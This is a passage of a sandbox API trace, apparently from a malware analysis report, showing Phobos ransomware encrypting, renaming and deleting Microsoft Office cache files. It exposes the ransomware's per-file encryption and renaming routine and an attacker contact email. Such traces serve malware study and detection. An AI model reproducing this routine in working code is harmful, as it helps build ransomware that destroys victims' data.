users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0153.647] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0153.647] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0153.647] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0153.647] ReadFile (in: hFile=0x148, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0153.724] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x14d4b5, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0153.724] ReadFile (in: hFile=0x148, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0153.751] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x3a7e1f, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0153.752] ReadFile (in: hFile=0x148, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0153.789] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32968) returned 1 [0153.789] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0153.789] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0153.797] CryptDestroyKey (hKey=0xa32968) returned 1 [0153.797] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0153.797] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0153.822] SetEndOfFile (hFile=0x148) returned 1 [0153.822] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x3a7e1f, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0153.822] WriteFile (in: hFile=0x148, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0153.824] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x14d4b5, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0153.824] WriteFile (in: hFile=0x148, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0153.826] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0153.826] WriteFile (in: hFile=0x148, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0153.827] CloseHandle (hObject=0x148) returned 1 [0153.828] SetEvent (hEvent=0xe8) returned 1 [0153.828] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0153.828] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0153.829] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2507776) returned 1 [0153.829] CloseHandle (hObject=0x148) returned 1 [0153.829] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi")) returned 0x2020 [0153.829] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0153.829] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0153.829] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0153.830] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0153.830] ReadFile (in: hFile=0x148, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0153.887] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0xcc155, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0153.887] ReadFile (in: hFile=0x148, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0153.948] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x224400, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0153.948] ReadFile (in: hFile=0x148, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0154.481] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32da8) returned 1 [0154.481] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0154.481] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0154.487] CryptDestroyKey (hKey=0xa32da8) returned 1 [0154.487] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0154.487] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0154.576] SetEndOfFile (hFile=0x148) returned 1 [0154.576] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x224400, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0154.576] WriteFile (in: hFile=0x148, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0154.578] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0xcc155, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0154.578] WriteFile (in: hFile=0x148, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0154.582] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0154.582] WriteFile (in: hFile=0x148, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0154.584] CloseHandle (hObject=0x148) returned 1 [0154.584] SetEvent (hEvent=0xe8) returned 1 [0154.584] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0154.584] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0154.584] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=107912) returned 1 [0154.584] CloseHandle (hObject=0x148) returned 1 [0154.584] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll")) returned 0x2020 [0154.585] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.585] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0154.585] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0154.585] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0154.585] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0154.585] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32da8) returned 1 [0154.585] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0154.585] ReadFile (in: hFile=0x148, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1a588, lpOverlapped=0x0) returned 1 [0154.701] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a590, dwBufLen=0x1a590 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a590) returned 1 [0154.702] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1a590, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1a590, lpOverlapped=0x0) returned 1 [0154.704] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0154.704] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0154.704] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0154.704] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.704] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0154.704] CryptDestroyKey (hKey=0xa32da8) returned 1 [0154.704] CloseHandle (hObject=0x148) returned 1 [0154.704] CloseHandle (hObject=0x15c) returned 1 [0154.705] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll")) returned 1 [0154.706] SetEvent (hEvent=0xe8) returned 1 [0154.706] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0154.706] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0154.708] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=838536) returned 1 [0154.708] CloseHandle (hObject=0x15c) returned 1 [0154.708] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe")) returned 0x2020 [0154.708] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.709] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0154.709] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0154.709] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0154.709] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0154.709] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32da8) returned 1 [0154.709] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0154.709] ReadFile (in: hFile=0x15c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xccb88, lpOverlapped=0x0) returned 1 [0154.883] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xccb90, dwBufLen=0xccb90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xccb90) returned 1 [0154.889] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xccb90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xccb90, lpOverlapped=0x0) returned 1 [0154.902] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32e28) returned 1 [0154.902] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0154.902] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0154.902] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.902] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0154.902] CryptDestroyKey (hKey=0xa32da8) returned 1 [0154.903] CloseHandle (hObject=0x15c) returned 1 [0154.903] CloseHandle (hObject=0x148) returned 1 [0154.903] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe")) returned 1 [0154.910] SetEvent (hEvent=0xe8) returned 1 [0154.911] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0154.911] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0154.911] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=526176) returned 1 [0154.911] CloseHandle (hObject=0x148) returned 1 [0154.911] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll")) returned 0x2020 [0154.911] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.911] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0154.912] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0154.912] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0154.912] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0154.912] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32da8) returned 1 [0154.912] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0154.912] ReadFile (in: hFile=0x148, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x80760, lpOverlapped=0x0) returned 1 [0155.178] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80770, dwBufLen=0x80770 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80770) returned 1 [0155.183] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x80770, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x80770, lpOverlapped=0x0) returned 1 [0155.191] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0155.191] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0155.191] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0155.191] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0155.191] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0155.191] CryptDestroyKey (hKey=0xa32da8) returned 1 [0155.191] CloseHandle (hObject=0x148) returned 1 [0155.191] CloseHandle (hObject=0x15c) returned 1 [0155.191] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll")) returned 1 [0155.196] SetEvent (hEvent=0xe8) returned 1 [0155.196] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0155.196] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0155.198] GetFileSizeEx (in: 